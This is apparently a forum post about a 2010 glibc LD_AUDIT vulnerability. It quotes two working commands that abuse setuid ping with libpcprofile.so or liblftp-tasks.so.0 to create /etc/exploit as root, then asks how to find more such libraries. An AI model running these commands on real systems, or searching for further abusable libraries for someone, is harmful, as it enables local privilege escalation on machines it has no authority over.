Hey,
As you might have noticed there is a new bug in glibc. It can be viewed here:
seclists[dot]org/fulldisclosure/2010/Oct/344
Basically, there are mentioned 2 DSO's that can create other files which is pretty unsecure.
Those are:
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/exploit" ping
LD_AUDIT="liblftp-tasks.so.0" LFTP_HOME=/etc/exploit ping
The file /etc/exploit will be created if you execute this. Anyhow, I'm wondering do you know more DSO's that can create files like that or how could I find more such files?
Thanks
Regards